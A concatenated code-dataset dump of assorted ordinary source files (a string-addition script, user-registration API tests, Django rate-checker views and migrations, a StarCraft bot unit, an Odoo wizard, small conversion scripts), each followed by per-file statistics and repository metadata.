val = carry
carry, val = val // 10, val % 10
sum_arr.appendleft(str(val))
i -= 1
return ''.join(list(sum_arr))
def main():
# Output: 807.
num1 = '342'
num2 = '465'
print SolutionPaddingAddBackwardIter().addStrings(num1, num2)
# Output: 10110.
num1 = '9999'
num2 = '111'
print SolutionPaddingAddBackwardIter().addStrings(num1, num2)
if __name__ == '__main__':
main()
| 25.027397 | 79 | 0.571429 | 238 | 1,827 | 4.331933 | 0.453782 | 0.062076 | 0.053346 | 0.043647 | 0.102813 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076737 | 0.322386 | 1,827 | 72 | 80 | 25.375 | 0.756058 | 0.087028 | 0 | 0.0625 | 0 | 0 | 0.021415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.03125 | null | null | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25dbd0ea80f4dcc92776fe99c6632dc557ac3ea6 | 4,574 | py | Python | tests/version2/test_users.py | SimonAwiti/Questioner-APIs | 514de4fd3af1726b7f89525c6bfaaed230842853 | [
"MIT"
] | null | null | null | tests/version2/test_users.py | SimonAwiti/Questioner-APIs | 514de4fd3af1726b7f89525c6bfaaed230842853 | [
"MIT"
] | 2 | 2019-01-15T16:02:32.000Z | 2019-01-23T03:32:29.000Z | tests/version2/test_users.py | SimonAwiti/Questioner-APIs | 514de4fd3af1726b7f89525c6bfaaed230842853 | [
"MIT"
] | 1 | 2019-01-13T23:39:06.000Z | 2019-01-13T23:39:06.000Z | """Tests for handling the users resource"""
import unittest
import json
from app import create_app
from app.API.utilities.database import connection
class UserTestCase(unittest.TestCase):
"""Unit testiing for the user regsitration endpoint"""
def setUp(self):
"""Initialize the app and database connections"""
self.app = create_app(config_name="testing")
self.client = self.app.test_client
self.user = {
"firstname" : "Ken",
"lastname" : "joseph",
"email" : "mysecret12@gmail.com",
"password" : "jos@Aeph12",
"confirm" : "jos@Aeph12",
}
self.user2 = {
"firstname" : "simon",
"lastname" : "jose",
"email" : "myseuuret12@gmail.com",
"password" : "joseph12",
}
self.user3 = {
"firstname" : "Ken",
"lastname" : "joseph",
"email" : "mysecret12@gmail.com",
"password" : "jo@Aeph12",
"confirm" : "jo@Aeph12",
}
self.user4 = {
"firstname" : "Ken",
"lastname" : "joseph",
"email" : "mysecret12gmail.com",
"password" : "jo@Aeph12",
"confirm" : "jo@Aeph12",
}
self.user5 = {
"firstname" : "Ken",
"lastname" : "joseph",
"email" : "mysecret12@gmail.com",
"password" : "josAeph12",
"confirm" : "jos@Aeph12",
}
with self.app.app_context():
connection.initializedb()
def create_user(self):
response = self.client().post('/api/v2/users/auth/register',
data=json.dumps(self.user),
content_type='application/json')
def tearDown(self):
"""Drops all tables after tests are done"""
with self.app.app_context():
connection.dbconnection()
connection.drop_tables()
def test_user_register(self):
"""Test to successfuly register a new user reg"""
response = self.client().post('/api/v2/users/auth/register',
data=json.dumps(self.user),
content_type='application/json')
#self.assertEqual(response.status_code, 201)
#self.assertIn('User Successfully Created', str(response.data))
def test_user_login(self):
"""Successfully log into the app"""
self.create_user()
response = self.client().post('/api/v2/users/auth/login',
data=json.dumps(self.user),
content_type='application/json')
#self.assertEqual(response.status_code, 200)
#self.assertIn('User Successfully logged in', str(response.data))
def test_login_wrong_passwords(self):
"""Tests for checking if password match"""
response = self.client().post(
'/api/v2/users/auth/login',
data=json.dumps(self.user2),
content_type='application/json')
#self.assertEqual(response.status_code, 401)
#self.assertIn("Error logging in, credentials not found", str(response.data))
def test_add_user_who_exists(self):
"""Tests for adding a new user who exists"""
self.create_user()
response = self.client().post(
'/api/v2/users/auth/register',
data=json.dumps(self.user),
content_type='application/json'
)
#self.assertEqual(response.status_code, 409)
#self.assertIn("There is a user with the same email registere", str(response.data))
def test_add_user_with_poor_email(self):
"""Tests for adding a new user with poor email"""
response = self.client().post(
'/api/v2/users/auth/register',
data=json.dumps(self.user4),
content_type='application/json'
)
#self.assertEqual(response.status_code, 401)
#self.assertIn("Invalid email provided", str(response.data))
def test_add_user_with_diff_pass(self):
"""Tests for adding a new user with diff password"""
response = self.client().post(
'/api/v2/users/auth/register',
data=json.dumps(self.user5),
content_type='application/json'
)
#self.assertEqual(response.status_code, 401)
#self.assertIn("Passwords do not match", str(response.data))
| 37.491803 | 91 | 0.547879 | 471 | 4,574 | 5.227176 | 0.265393 | 0.032494 | 0.051178 | 0.062551 | 0.586515 | 0.556052 | 0.530869 | 0.50853 | 0.43095 | 0.361495 | 0 | 0.01943 | 0.32488 | 4,574 | 122 | 92 | 37.491803 | 0.77785 | 0.233931 | 0 | 0.482353 | 0 | 0 | 0.205635 | 0.059251 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105882 | false | 0.082353 | 0.047059 | 0 | 0.164706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
25e441bb1d41908f9089cf20c37bdbf87f2df670 | 8,415 | py | Python | ratechecker/views.py | DalavanCloud/owning-a-home-api | f7be713740ecfaaaf3fc2f54510c24543e563e9f | [
"CC0-1.0"
] | 1 | 2019-02-25T21:46:14.000Z | 2019-02-25T21:46:14.000Z | ratechecker/views.py | DalavanCloud/owning-a-home-api | f7be713740ecfaaaf3fc2f54510c24543e563e9f | [
"CC0-1.0"
] | null | null | null | ratechecker/views.py | DalavanCloud/owning-a-home-api | f7be713740ecfaaaf3fc2f54510c24543e563e9f | [
"CC0-1.0"
] | null | null | null | from django.db.models import Q, Sum, Avg
from rest_framework import status
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework.views import APIView
from ratechecker.models import Region, Rate, Adjustment, Fee
from ratechecker.ratechecker_parameters import ParamsSerializer
def get_rates(params_data, data_load_testing=False, return_fees=False):
""" params_data is a method parameter of type RateCheckerParameters."""
# the precalculated results are done by favoring negative points over
# positive ones, and the API does the opposite
factor = 1
if data_load_testing:
factor = -1
region_ids = list(Region.objects.filter(
state_id=params_data.get('state')).values_list('region_id', flat=True))
if not region_ids:
return {'data': {}, 'timestamp': None}
rates = Rate.objects.filter(
region_id__in=region_ids,
product__loan_purpose=params_data.get('loan_purpose'),
product__pmt_type=params_data.get('rate_structure'),
product__loan_type=params_data.get('loan_type'),
product__max_ltv__gte=params_data.get('max_ltv'),
product__loan_term=params_data.get('loan_term'),
product__max_loan_amt__gte=params_data.get('loan_amount'),
product__max_fico__gte=params_data.get('maxfico'),
product__min_fico__lte=params_data.get('minfico'))
if params_data.get('loan_type') != 'FHA-HB':
rates = rates.filter(
product__min_loan_amt__lte=params_data.get('loan_amount'))
if params_data.get('rate_structure') == 'ARM':
rates = rates.filter(
product__int_adj_term=params_data.get('arm_type')[:-2],
product__io=bool(params_data.get('io')))
if data_load_testing:
rates = rates.filter(
product__institution=params_data.get('institution'),
lock=params_data.get('lock'))
else:
rates = rates.filter(
lock__lte=params_data.get('max_lock', 0),
lock__gt=params_data.get('min_lock', 0))
all_rates = []
products = {}
for rate in rates:
all_rates.append(rate)
products["{}{}".format(
rate.product_id, rate.region_id)] = rate.product_id
product_ids = products.values()
adjustments = Adjustment.objects.filter(
product__plan_id__in=product_ids).filter(
Q(max_loan_amt__gte=params_data.get('loan_amount'))
| Q(max_loan_amt__isnull=True),
Q(min_loan_amt__lte=params_data.get('loan_amount'))
| Q(min_loan_amt__isnull=True),
Q(prop_type=params_data.get('property_type'))
| Q(prop_type__isnull=True) | Q(prop_type=""),
Q(state=params_data.get('state'))
| Q(state__isnull=True) | Q(state=""),
Q(max_fico__gte=params_data.get('maxfico'))
| Q(max_fico__isnull=True),
Q(min_fico__lte=params_data.get('minfico'))
| Q(min_fico__isnull=True),
Q(min_ltv__lte=params_data.get('min_ltv'))
| Q(min_ltv__isnull=True),
Q(max_ltv__gte=params_data.get('max_ltv'))
| Q(max_ltv__isnull=True),
).values('product_id',
'affect_rate_type').annotate(sum_of_adjvalue=Sum('adj_value'))
summed_adj_dict = {}
for adj in adjustments:
current = summed_adj_dict.get(adj['product_id'], {})
current[adj['affect_rate_type']] = adj['sum_of_adjvalue']
summed_adj_dict[adj['product_id']] = current
available_rates = {}
data_timestamp = ""
for rate in all_rates:
# TODO: check that it the same all the time, and do what if it is not?
data_timestamp = rate.data_timestamp
product = summed_adj_dict.get(rate.product_id, {})
rate.total_points += product.get('P', 0)
rate.base_rate += product.get('R', 0)
distance = abs(params_data.get('points') - rate.total_points)
if float(distance) > 0.5:
continue
if rate.product_id not in available_rates:
available_rates[rate.product_id] = rate
else:
current_difference = abs(
params_data.get('points') -
available_rates[rate.product_id].total_points
)
new_difference = abs(params_data.get('points') - rate.total_points)
if new_difference < current_difference or (
new_difference == current_difference and
factor * available_rates[
rate.product_id].total_points < 0 and
factor * rate.total_points > 0):
available_rates[rate.product_id] = rate
data = {}
for rate in available_rates:
key = str(available_rates[rate].base_rate)
current_value = data.get(key, 0)
if data_load_testing:
data[key] = "%s" % available_rates[rate].total_points
else:
data[key] = current_value + 1
results = {'data': data, 'timestamp': data_timestamp}
if return_fees and data:
fees = Fee.objects.filter(plan__plan_id__in=available_rates.keys(),
state_id=params_data.get('state'))
if params_data.get('property_type', 'SF') == 'SF':
fees = fees.filter(single_family=True)
elif params_data.get('property_type', 'SF') == 'CONDO':
fees = fees.filter(condo=True)
elif params_data.get('property_type', 'SF') == 'COOP':
fees = fees.filter(coop=True)
averages = fees.aggregate(
origination_dollar=Avg('origination_dollar'),
origination_percent=Avg('origination_percent'),
third_party=Avg('third_party'))
results['fees'] = averages
if not data:
obj = Region.objects.first()
if obj:
results['timestamp'] = obj.data_timestamp
return results
def set_lock_max_min(data):
"""Set max and min lock values before serializer validation"""
lock_map = {
'30': (0, 30),
'45': (31, 45),
'60': (46, 60)
}
lock = data.get('lock')
if lock and lock in lock_map:
data['min_lock'] = lock_map[lock][0]
data['max_lock'] = lock_map[lock][1]
return data
else:
return data
@api_view(['GET'])
def rate_checker(request):
"""
Return available rates in percentage and number of institutions
with the corresponding rate
(i.e. "4.75": 2 means there are 2 institutions with the rate of 4.75%)
"""
if request.method == 'GET':
# Clean the parameters, make sure no leading or trailing spaces,
# transform them to upper cases
fixed_data = dict(map(
lambda (k, v): (k, v.strip().upper()),
request.query_params.iteritems()))
fixed_data = set_lock_max_min(fixed_data)
serializer = ParamsSerializer(data=fixed_data)
if serializer.is_valid():
rate_results = get_rates(serializer.validated_data)
rate_results['request'] = serializer.validated_data
return Response(rate_results)
else:
return Response(serializer.errors,
status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET'])
def rate_checker_fees(request):
"""
Return available rates in percentage and number of institutions
with the corresponding rate along with fees data
"""
if request.method == 'GET':
# Clean the parameters, make sure no leading or trailing spaces,
# transform them to upper cases
fixed_data = dict(map(
lambda (k, v): (k, v.strip().upper()),
request.query_params.iteritems()))
serializer = ParamsSerializer(data=fixed_data)
if serializer.is_valid():
rate_results = get_rates(
serializer.validated_data, return_fees=True)
rate_results['request'] = serializer.validated_data
return Response(rate_results)
else:
return Response(
serializer.errors, status=status.HTTP_400_BAD_REQUEST
)
class RateCheckerStatus(APIView):
def get(self, request, format=None):
try:
load_ts = Region.objects.latest('data_timestamp').data_timestamp
except Region.DoesNotExist:
load_ts = None
return Response({'load': load_ts})
| 36.907895 | 79 | 0.627213 | 1,056 | 8,415 | 4.700758 | 0.203598 | 0.070508 | 0.086422 | 0.027397 | 0.389605 | 0.346293 | 0.299758 | 0.260274 | 0.234891 | 0.190169 | 0 | 0.00741 | 0.26227 | 8,415 | 227 | 80 | 37.070485 | 0.792204 | 0.043613 | 0 | 0.2 | 0 | 0 | 0.075372 | 0 | 0 | 0 | 0 | 0.004405 | 0 | 0 | null | null | 0 | 0.04 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25e493076be7380951a97b3f9afcdfcdb4f2cbab | 2,247 | py | Python | sharpy/managers/combat2/protoss/micro_voidrays.py | raspersc2/sharpy-sc2 | ec8f5870eab233b1d09a54a09bd8b76ea2585735 | [
"MIT"
] | 2 | 2020-08-13T01:25:20.000Z | 2020-11-22T19:00:06.000Z | sharpy/managers/combat2/protoss/micro_voidrays.py | raspersc2/sharpy-sc2 | ec8f5870eab233b1d09a54a09bd8b76ea2585735 | [
"MIT"
] | null | null | null | sharpy/managers/combat2/protoss/micro_voidrays.py | raspersc2/sharpy-sc2 | ec8f5870eab233b1d09a54a09bd8b76ea2585735 | [
"MIT"
] | null | null | null | from sc2.ids.effect_id import EffectId
from sc2.position import Point2
from sc2.units import Units
from sharpy.managers.combat2 import MicroStep, Action, MoveType
from sc2 import AbilityId
from sc2.unit import Unit
class MicroVoidrays(MicroStep):
def should_retreat(self, unit: Unit) -> bool:
if unit.shield_max + unit.health_max > 0:
health_percentage = (unit.shield + unit.health) / (unit.shield_max + unit.health_max)
else:
health_percentage = 0
if health_percentage < 0.2 or unit.weapon_cooldown < 0:
# low hp or unit can't attack
return True
for effect in self.ai.state.effects:
if effect.id == EffectId.RAVAGERCORROSIVEBILECP:
if Point2.center(effect.positions).distance_to(unit) < 3:
return True
if effect.id == EffectId.BLINDINGCLOUDCP:
if Point2.center(effect.positions).distance_to(unit) < 4:
return True
if effect.id == EffectId.PSISTORMPERSISTENT:
if Point2.center(effect.positions).distance_to(unit) < 4:
return True
return False
def group_solve_combat(self, units: Units, current_command: Action) -> Action:
return current_command
def unit_solve_combat(self, unit: Unit, current_command: Action) -> Action:
if self.engage_ratio < 0.25 and self.can_engage_ratio < 0.25:
return current_command
if self.move_type in {MoveType.PanicRetreat, MoveType.DefensiveRetreat}:
return current_command
if self.cd_manager.is_ready(unit.tag, AbilityId.EFFECT_VOIDRAYPRISMATICALIGNMENT):
close_enemies = self.cache.enemy_in_range(unit.position, 7).filter(lambda u: u.is_armored)
if close_enemies:
return Action(None, False, AbilityId.EFFECT_VOIDRAYPRISMATICALIGNMENT)
if not self.should_shoot() and self.should_retreat(unit):
pos = self.pather.find_weak_influence_air(unit.position, 4)
return Action(pos, False)
return self.focus_fire(unit, current_command, None)
def should_shoot(self):
tick = self.ai.state.game_loop % 24
return tick < 8
| 40.854545 | 102 | 0.655986 | 280 | 2,247 | 5.107143 | 0.367857 | 0.058741 | 0.020979 | 0.037762 | 0.21049 | 0.174126 | 0.105594 | 0.105594 | 0.075524 | 0.075524 | 0 | 0.017533 | 0.263907 | 2,247 | 54 | 103 | 41.611111 | 0.847037 | 0.012016 | 0 | 0.209302 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.093023 | false | 0 | 0.139535 | 0.023256 | 0.534884 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
25f057af076ce41992855839a657edce5d7a7ef6 | 931 | py | Python | scripts/processcore.py | paulscottrobson/flat-forth-compiler | c9df5156219da67c08776445a87e055f8cbb3a82 | [
"MIT"
] | null | null | null | scripts/processcore.py | paulscottrobson/flat-forth-compiler | c9df5156219da67c08776445a87e055f8cbb3a82 | [
"MIT"
] | 1 | 2019-03-03T21:21:07.000Z | 2020-07-02T09:20:31.000Z | scripts/processcore.py | paulscottrobson/flat-forth-compiler | c9df5156219da67c08776445a87e055f8cbb3a82 | [
"MIT"
] | null | null | null | # ***************************************************************************************
# ***************************************************************************************
#
# Name : processcore.py
# Author : Paul Robson (paul@robsons.org.uk)
# Date : 22nd December 2018
# Purpose : Convert vocabulary.asm to assemblable file by adding marker labels.
#
# ***************************************************************************************
# ***************************************************************************************
#
# Copy vocabulary.asm to __words.asm
#
hOut = open("__words.asm","w")
for l in [x.rstrip() for x in open("vocabulary.asm").readlines()]:
hOut.write(l+"\n")
#
# If ;; found insert a label which is generated using ASCII so all chars can be used
#
if l[:2] == ";;":
name = "_".join([str(ord(x)) for x in l[2:].strip()])
hOut.write("core_{0}:\n".format(name))
hOut.close() | 38.791667 | 89 | 0.396348 | 91 | 931 | 3.989011 | 0.681319 | 0.107438 | 0.082645 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010949 | 0.117078 | 931 | 24 | 90 | 38.791667 | 0.430657 | 0.696026 | 0 | 0 | 0 | 0 | 0.157303 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25f4632219bc28cba2e575a7f1f0e698d9f3b930 | 307 | py | Python | converters/all_lp2dgf.py | daajoe/transit_graphs | ac9a7b390f0f4c671a4c66157c9ff20773bb0105 | [
"CC-BY-4.0"
] | null | null | null | converters/all_lp2dgf.py | daajoe/transit_graphs | ac9a7b390f0f4c671a4c66157c9ff20773bb0105 | [
"CC-BY-4.0"
] | null | null | null | converters/all_lp2dgf.py | daajoe/transit_graphs | ac9a7b390f0f4c671a4c66157c9ff20773bb0105 | [
"CC-BY-4.0"
] | null | null | null | #!/usr/bin/env bash
trap 'ret=$?; printf "%s\n" "$ERR_MSG" >&2; exit "$ret"' ERR
for file in $(find $1 -name \*.lp.bz2) ; do
echo $file
outputname="../gr/subgraphs/$(basename $file).gr"
./lp2dgf.py -f $file > $outputname
if [ $? -ne 0 ]; then
echo 'ERROR stopping...'
exit 1
fi
done
| 21.928571 | 60 | 0.566775 | 48 | 307 | 3.604167 | 0.791667 | 0.16185 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025 | 0.218241 | 307 | 13 | 61 | 23.615385 | 0.695833 | 0.058632 | 0 | 0 | 0 | 0 | 0.354167 | 0.090278 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25f55d84b2c9772cbbe9d0c481378e4191bf77e2 | 362 | py | Python | formulario/urls.py | exildev/Rondax | a4a4cad4ec9c575a288f66a353e07e9a57362ede | [
"Apache-2.0"
] | null | null | null | formulario/urls.py | exildev/Rondax | a4a4cad4ec9c575a288f66a353e07e9a57362ede | [
"Apache-2.0"
] | null | null | null | formulario/urls.py | exildev/Rondax | a4a4cad4ec9c575a288f66a353e07e9a57362ede | [
"Apache-2.0"
] | null | null | null | from django.conf.urls import include, url
from formulario import views
urlpatterns = [
url(r'^form/registro/(?P<pk>\d+)/$', views.RegistroSupraForm.as_view(), name='form_registro'),
url(r'^form/registro/create/$', views.RegistroCreateSupraForm.as_view(), name='form_crear_registro'),
url(r'^list/campo/$', views.CampoListView.as_view(), name='campo_list'),
] | 45.25 | 102 | 0.740331 | 50 | 362 | 5.22 | 0.52 | 0.045977 | 0.114943 | 0.122605 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069061 | 362 | 8 | 103 | 45.25 | 0.774481 | 0 | 0 | 0 | 0 | 0 | 0.292011 | 0.140496 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25f569e19f03eb74cba3e7ed842d1742b9a17719 | 381 | py | Python | customers/customerauth/migrations/0002_auto_20190127_0931.py | nkmrohit/python | bd644d51909cda548684b5da98eab998564f3568 | [
"Apache-2.0"
] | null | null | null | customers/customerauth/migrations/0002_auto_20190127_0931.py | nkmrohit/python | bd644d51909cda548684b5da98eab998564f3568 | [
"Apache-2.0"
] | null | null | null | customers/customerauth/migrations/0002_auto_20190127_0931.py | nkmrohit/python | bd644d51909cda548684b5da98eab998564f3568 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.1.4 on 2019-01-27 04:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('customerauth', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='customers',
name='address',
field=models.TextField(blank=True),
),
]
| 20.052632 | 47 | 0.593176 | 39 | 381 | 5.74359 | 0.820513 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.07037 | 0.291339 | 381 | 18 | 48 | 21.166667 | 0.759259 | 0.11811 | 0 | 0 | 1 | 0 | 0.11976 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25fbbd609cc07a46c89f0cadbaed9a2029ec86bf | 1,739 | py | Python | migrations/versions/00f001a958b1_web_dev_chapter3_quiz_total_score.py | GitauHarrison/somasoma_V1 | 2d74ad3b58f7e4ea5334e240d5bd30938f615e24 | [
"MIT"
] | null | null | null | migrations/versions/00f001a958b1_web_dev_chapter3_quiz_total_score.py | GitauHarrison/somasoma_V1 | 2d74ad3b58f7e4ea5334e240d5bd30938f615e24 | [
"MIT"
] | null | null | null | migrations/versions/00f001a958b1_web_dev_chapter3_quiz_total_score.py | GitauHarrison/somasoma_V1 | 2d74ad3b58f7e4ea5334e240d5bd30938f615e24 | [
"MIT"
] | null | null | null | """web dev chapter3 quiz total score
Revision ID: 00f001a958b1
Revises: b95f0132b231
Create Date: 2022-03-02 11:57:04.695611
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '00f001a958b1'
down_revision = 'b95f0132b231'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('web_dev_chapter3_quiz_total_score',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('total_score', sa.String(length=64), nullable=True),
sa.Column('timestamp', sa.DateTime(), nullable=True),
sa.Column('student_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['student_id'], ['student.id'], name=op.f('fk_web_dev_chapter3_quiz_total_score_student_id_student')),
sa.PrimaryKeyConstraint('id', name=op.f('pk_web_dev_chapter3_quiz_total_score'))
)
with op.batch_alter_table('web_dev_chapter3_quiz_total_score', schema=None) as batch_op:
batch_op.create_index(batch_op.f('ix_web_dev_chapter3_quiz_total_score_timestamp'), ['timestamp'], unique=False)
batch_op.create_index(batch_op.f('ix_web_dev_chapter3_quiz_total_score_total_score'), ['total_score'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('web_dev_chapter3_quiz_total_score', schema=None) as batch_op:
batch_op.drop_index(batch_op.f('ix_web_dev_chapter3_quiz_total_score_total_score'))
batch_op.drop_index(batch_op.f('ix_web_dev_chapter3_quiz_total_score_timestamp'))
op.drop_table('web_dev_chapter3_quiz_total_score')
# ### end Alembic commands ###
| 39.522727 | 130 | 0.748131 | 251 | 1,739 | 4.816733 | 0.282869 | 0.124069 | 0.127378 | 0.163772 | 0.519438 | 0.519438 | 0.449959 | 0.325889 | 0.325889 | 0.325889 | 0 | 0.045425 | 0.126509 | 1,739 | 43 | 131 | 40.44186 | 0.750494 | 0.181139 | 0 | 0.086957 | 0 | 0 | 0.366979 | 0.296323 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0.086957 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25fef9ef873e5740a2ff06f1845a4837d7c9fc74 | 916 | py | Python | pos_repair_order/wizard/assign_wizard.py | divyapy/odoo | a4b796fc8a9d291ff1b4c93e53e27f566947adf2 | [
"MIT"
] | null | null | null | pos_repair_order/wizard/assign_wizard.py | divyapy/odoo | a4b796fc8a9d291ff1b4c93e53e27f566947adf2 | [
"MIT"
] | null | null | null | pos_repair_order/wizard/assign_wizard.py | divyapy/odoo | a4b796fc8a9d291ff1b4c93e53e27f566947adf2 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from odoo import api, fields, models, _
class AssignMechanicWizard(models.TransientModel):
_name = 'assign.mechanic.wizard'
_description = 'Assign Mechanic Wizard'
# relations
mechanic_ids = fields.Many2many('hr.employee', string="Assign Mechanic")
repair_id = fields.Many2one("repair.order")
def assign_mechanic(self):
"""
Assign mechanic to the repair.order.
"""
self.repair_id.mechanic_ids = [(6, 0, self.mechanic_ids.ids)]
return True
class AssignBayWizard(models.TransientModel):
_name='assign.bay.wizard'
_description = 'Assign Bay Wizard'
# relations
bay_id = fields.Many2one("bay", "Bay")
repair_id = fields.Many2one("repair.order")
def assign_bay(self):
"""
Assign bay to the repair.order.
"""
self.repair_id.assign_bay_id = self.bay_id
return True | 27.757576 | 76 | 0.648472 | 106 | 916 | 5.433962 | 0.349057 | 0.121528 | 0.083333 | 0.104167 | 0.243056 | 0.243056 | 0.243056 | 0.145833 | 0 | 0 | 0 | 0.009957 | 0.232533 | 916 | 33 | 77 | 27.757576 | 0.809388 | 0.121179 | 0 | 0.235294 | 0 | 0 | 0.177015 | 0.029062 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.058824 | 0 | 0.882353 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d315ddafc00e303827ed142f393b01062bb40a46 | 720 | py | Python | PointCloudClass/down_sample.py | 565353780/pointcloud-manage | 77f16671ec0b88f53cd9fde2538143721f9d3ab6 | [
"MIT"
] | 3 | 2022-01-16T12:43:29.000Z | 2022-01-22T05:21:40.000Z | PointCloudClass/down_sample.py | 565353780/pointcloud-manage | 77f16671ec0b88f53cd9fde2538143721f9d3ab6 | [
"MIT"
] | null | null | null | PointCloudClass/down_sample.py | 565353780/pointcloud-manage | 77f16671ec0b88f53cd9fde2538143721f9d3ab6 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import open3d as o3d
def downSample(pointcloud_file_path, down_sample_cluster_num, save_pointcloud_file_path):
print("[INFO][downSample]")
print("\t start down sampling pointcloud :")
print("\t down_sample_cluster_num = " + str(down_sample_cluster_num) + "...")
pointcloud = o3d.io.read_point_cloud(pointcloud_file_path, print_progress=True)
down_sampled_pointcloud = o3d.geometry.PointCloud.uniform_down_sample(
pointcloud, down_sample_cluster_num)
o3d.io.write_point_cloud(
save_pointcloud_file_path,
down_sampled_pointcloud,
write_ascii=True,
print_progress=True)
print("SUCCESS!")
return True
| 31.304348 | 89 | 0.722222 | 92 | 720 | 5.271739 | 0.434783 | 0.103093 | 0.148454 | 0.164948 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010067 | 0.172222 | 720 | 22 | 90 | 32.727273 | 0.803691 | 0.058333 | 0 | 0 | 0 | 0 | 0.137778 | 0.034074 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.066667 | 0 | 0.2 | 0.4 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3162e78a871415bab1f9452d82a894abaab0f56 | 44,224 | py | Python | Course-4-Clustering-and-Retrieval/week-3-k-means-with-text-data_blank.py | emetnatbelt/Machine-Learning-Univ-Washington1 | 6e6f9cd69b69157f5c09eed299ab120bf6764de3 | [
"MIT"
